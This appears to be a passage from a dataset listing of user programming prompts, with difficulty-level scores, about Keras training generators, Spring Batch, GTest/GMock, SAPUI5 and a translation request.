at deployment.acq-company-web.war//org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
at deployment.acq-company-web.war//org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
... 91 more
|
37e482cd0cd5b728dc81d1c26adc40be
|
{
"intermediate": 0.4754568934440613,
"beginner": 0.2788739800453186,
"expert": 0.2456691563129425
}
|
46,781
|
""START:Please modify the code correctly."에서 "END:Please modify the code correctly."까지의 코드 중 이상한 부분을 수정해주세요."를 영작해줘.
|
bb7f10a9504c11824bf0763f7dc4eac7
|
{
"intermediate": 0.27752795815467834,
"beginner": 0.31940561532974243,
"expert": 0.4030664265155792
}
|
46,782
|
i have following code :
# %%
import pandas as pd
import numpy as np
from tensorflow import keras
from sklearn.preprocessing import StandardScaler
def data_generator(file_path, batch_size):
chunksize = batch_size
while True: # Loop forever, so the generator never terminates
for chunk in pd.read_csv(file_path, chunksize=chunksize):
# Assuming your CSV has headers that match features/targets
# Normalizing the features
filtered_c = chunk.drop(['Date', 'Symbol'], axis=1)
feature_data = filtered_c.drop([
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1)
target_data = filtered_c[['y_High_1d'
, 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'
]]
scaler = StandardScaler()
feature_data_scaled = pd.DataFrame(scaler.fit_transform(feature_data), columns=feature_data.columns)
# Assuming target_data also needs to be scaled, apply scaler separately
target_data_scaled = pd.DataFrame(scaler.fit_transform(target_data), columns=target_data.columns)
# Now, feature_data_scaled and target_data_scaled are both DataFrames, scaled and ready to use
yield feature_data_scaled.values, target_data_scaled.values
# %%
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Input
import tensorflow as tf
def build_model():
input_shape = (6427,)
model = Sequential([
Dense(6427, activation='relu', input_shape = input_shape),
Dropout(0.25),
Dense(3200, activation='relu'),
Dropout(0.20),
Dense(1800, activation='relu'),
Dropout(0.15),
Dense(1024, activation='relu'),
Dropout(0.10),
Dense(512, activation='relu'),
Dropout(0.05),
Dense(256, activation='relu'),
Dense(128, activation='relu'),
Dense(64, activation='relu'),
Dense(32, activation='relu'),
Dense(12),
])
model.compile(optimizer='adam',
loss='mse', # Use Mean Squared Error for regression
metrics=['mae']) # Mean Absolute Error as an additional metric
return model
# %%
file_path = r"C:\Users\arisa\Desktop\combined_day.csv"
batch_size = 128
# Instantiate the model
model = build_model()
model.summary()
# %%
# Setup the data generator
train_generator = data_generator(file_path,batch_size)
# Assuming you know or calculate the total number of rows in advance
total_samples = 1000000 # Example number, replace with your dataset's size
steps_per_epoch = total_samples // batch_size
# Train the model
model.fit(train_generator, steps_per_epoch=1000, epochs=10)
update it so it splits data to train and val and use its to train model
|
af9914ad18c9fdbf888e5c0953cef746
|
{
"intermediate": 0.36976394057273865,
"beginner": 0.3796335458755493,
"expert": 0.25060248374938965
}
|
46,783
|
create a Gtest UT test case and Gmock with below code static int updateDisplay(void){
int ret = false;
switch (getDisplay())
{
case eHomeDisplay :
sprintf(cluster_screen.disp_name,currentDisplay);
cluster_screen.width = m_parameterInfo[eHomeDisplay].width;
cluster_screen.height = m_parameterInfo[eHomeDisplay].height;
break;
case eWideDisplay :
sprintf(cluster_screen.disp_name,currentDisplay);
cluster_screen.width = m_parameterInfo[eWideDisplay].width;
cluster_screen.height = m_parameterInfo[eWideDisplay].height;
break;
case eDesktopDisplay :
sprintf(cluster_screen.disp_name,currentDisplay);
cluster_screen.width = m_parameterInfo[eDesktopDisplay].width;
cluster_screen.height = m_parameterInfo[eDesktopDisplay].height;
break;
default:
break;
}
ret = true;
return ret;
}
|
0277698c6a0b388ac2c38b1fc7badf30
|
{
"intermediate": 0.3739706575870514,
"beginner": 0.40253937244415283,
"expert": 0.22348996996879578
}
|
46,784
|
Hi there, please be a sapui5 senior developer and answer my question with working code examples.
|
e29eeff8381727d2f7914d53c1d10b4b
|
{
"intermediate": 0.4024829566478729,
"beginner": 0.2911725640296936,
"expert": 0.3063444495201111
}
|
46,785
|
package com.mns.oms.batch.listener;
import com.mns.oms.batch.domain.JobStatistics;
import com.mns.oms.batch.mapper.CycleAvoidingMappingContext;
import com.mns.oms.batch.mapper.StepDataMapper;
import com.mns.oms.batch.model.JobStepDetails;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.batch.core.BatchStatus;
import org.springframework.batch.core.JobExecution;
import org.springframework.batch.core.listener.JobExecutionListenerSupport;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.data.mongodb.core.MongoTemplate;
import org.springframework.stereotype.Component;
import java.io.File;
import java.time.ZoneId;
import java.util.ArrayList;
import java.util.List;
/**
* @author Mrinmoy Mandal
*
* Module: WISMR
*
*/
@Component
public class JobStatusNotificationListener extends JobExecutionListenerSupport {
private static final Logger log = LoggerFactory.getLogger(JobStatusNotificationListener.class);
private JobStatistics jobStats;
private List<JobStepDetails> stepExecList;
private List<String> fileList;
@Autowired
MongoTemplate mongoTemplate;
@Override
public void beforeJob(JobExecution jobExecution) {
if (jobExecution.getStatus() == BatchStatus.STARTED) {
log.debug("JobExecution object--> {}", jobExecution);
log.info("<----------------------------JOB - {} STARTED with job id: {}--------------------------------------->",
jobExecution.getJobInstance().getJobName(), jobExecution.getJobInstance().getId());
log.debug("mongoTemplate template---->{}", mongoTemplate);
}
}
@Override
public void afterJob(JobExecution jobExecution) {
saveJobStatisticsData(jobExecution);
if (jobExecution.getStatus() == BatchStatus.COMPLETED) {
log.info("<----------------------------JOB - {} FINISHED with job id: {}--------------------------------------->",
jobExecution.getJobInstance().getJobName(), jobExecution.getJobInstance().getId());
}
}
/**
* This method will be used to save job statistics data.
*
* @param jobExecution
*/
private void saveJobStatisticsData(JobExecution jobExecution) {
jobStats = new JobStatistics();
stepExecList = new ArrayList<>();
fileList = new ArrayList<>();
jobStats.setJobId(jobExecution.getJobInstance().getId());
jobStats.setJobName(jobExecution.getJobInstance().getJobName());
jobStats.setStartTime(jobExecution.getStartTime().toInstant().atZone(ZoneId.systemDefault()).toLocalDateTime());
jobStats.setEndTime(jobExecution.getEndTime().toInstant().atZone(ZoneId.systemDefault()).toLocalDateTime());
jobStats.setJobStatus(jobExecution.getStatus().toString());
jobStats.setJobExitStatus(jobExecution.getExitStatus().getExitCode().toString());
jobStats.setJobExitDescription(jobExecution.getExitStatus().getExitDescription().toString());
jobStats.setLastModifieDate(
jobExecution.getLastUpdated().toInstant().atZone(ZoneId.systemDefault()).toLocalDateTime());
jobStats.setCreatedDate(
jobExecution.getCreateTime().toInstant().atZone(ZoneId.systemDefault()).toLocalDateTime());
jobExecution.getStepExecutions().forEach(stepExec -> {
log.debug("Step exec context------> {}", stepExec.getExecutionContext());
JobStepDetails stepDetails = StepDataMapper.INSTANCE.getStepDetails(stepExec,
new CycleAvoidingMappingContext());
stepExecList.add(stepDetails);
log.debug("File List---> {}", fileList);
if (stepExec.getExecutionContext().containsKey("fileName")) {
fileList.add(new File(stepExec.getExecutionContext().getString("fileName")).getName());
}
});
log.debug("JobExecution object--> {}", jobExecution);
log.debug("JobExecutionstep exec object--> {}", jobExecution.getStepExecutions());
log.debug("JobExecution job inst object--> {}", jobExecution.getJobInstance());
log.debug("JobExecution job exec context object--> {}", jobExecution.getExecutionContext());
jobStats.setFileList(fileList);
jobStats.setStepDetails(stepExecList);
log.debug("Job Statistics to be saved in DB-----> {}", jobStats);
mongoTemplate.save(jobStats);
}
}this is the issue.....method toInstant in interface java.time.chrono.ChronoLocalDateTime<D> cannot be applied to given types;......explain and fix
|
c12965afec41938d148c41098a97db0f
|
{
"intermediate": 0.2681535482406616,
"beginner": 0.4390513002872467,
"expert": 0.2927951514720917
}
|
46,786
|
i have following code:
# %%
import pandas as pd
import numpy as np
from tensorflow import keras
from sklearn.preprocessing import StandardScaler
def data_generator(file_path, batch_size, data_type):
chunksize = batch_size
total_rows = 301617 # Adjust with your dataset's actual number of rows
split_ratio = 0.92 # Assuming 80% for train, 20% for validation
train_rows = int(total_rows * split_ratio)
while True: # Loop forever, so the generator never terminates
for chunk in pd.read_csv(file_path, chunksize=chunksize):
if data_type == 'train' and row_counter >= train_rows:
continue # Skip the rest if we are fetching training data but have reached the end of the train set
elif data_type == 'val' and row_counter < train_rows:
row_counter += len(chunk)
continue # Skip this chunk if we are fetching validation data but are still in the train range
# Assuming your CSV has headers that match features/targets
# Normalizing the features
filtered_c = chunk.drop(['Date', 'Symbol'], axis=1)
feature_data = filtered_c.drop([
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1)
target_data = filtered_c[['y_High_1d'
, 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'
]]
scaler = StandardScaler()
feature_data_scaled = pd.DataFrame(scaler.fit_transform(feature_data), columns=feature_data.columns)
# Assuming target_data also needs to be scaled, apply scaler separately
target_data_scaled = pd.DataFrame(scaler.fit_transform(target_data), columns=target_data.columns)
# Now, feature_data_scaled and target_data_scaled are both DataFrames, scaled and ready to use
yield feature_data_scaled.values, target_data_scaled.values
row_counter += len(chunk)
# %%
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Input
import tensorflow as tf
def build_model():
input_shape = (6427,)
model = Sequential([
Dense(6427, activation='relu', input_shape = input_shape),
Dropout(0.25),
Dense(3200, activation='relu'),
Dropout(0.20),
Dense(1800, activation='relu'),
Dropout(0.15),
Dense(1024, activation='relu'),
Dropout(0.10),
Dense(512, activation='relu'),
Dropout(0.05),
Dense(256, activation='relu'),
Dense(128, activation='relu'),
Dense(64, activation='relu'),
Dense(32, activation='relu'),
Dense(12),
])
model.compile(optimizer='adam',
loss='mse', # Use Mean Squared Error for regression
metrics=['mae']) # Mean Absolute Error as an additional metric
return model
# %%
file_path = r"C:\Users\arisa\Desktop\combined_day.csv"
batch_size = 128
# Instantiate the model
model = build_model()
model.summary()
# %%
train_generator = data_generator(file_path, batch_size, 'train')
val_generator = data_generator(file_path, batch_size, 'val')
total_samples = 301617 # Assuming same example size
train_samples = int(total_samples * 0.92)
val_samples = total_samples - train_samples
steps_per_epoch = train_samples // batch_size
validation_steps = val_samples // batch_size
# Modify the model fitting call to include validation data
model.fit(
train_generator,
steps_per_epoch=steps_per_epoch,
epochs=100,
validation_data=val_generator,
validation_steps=validation_steps
)
# %%
# Setup the data generator
train_generator = data_generator(file_path,batch_size)
# Assuming you know or calculate the total number of rows in advance
total_samples = 301617 # Example number, replace with your dataset's size
steps_per_epoch = total_samples // batch_size
# Train the model
model.fit(train_generator, steps_per_epoch=1000, epochs=10)
# %%
import tensorflow as tf
if tf.test.gpu_device_name():
print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))
else:
print('Please install GPU version of TF')
is there a way that i can use a general StandardScaler for my dataset instead of creating new StandardScaler for each chunk?which approach is suggested
|
9eeca25900d19ece0b3d2466702291d1
|
{
"intermediate": 0.46519041061401367,
"beginner": 0.3712368309497833,
"expert": 0.16357272863388062
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.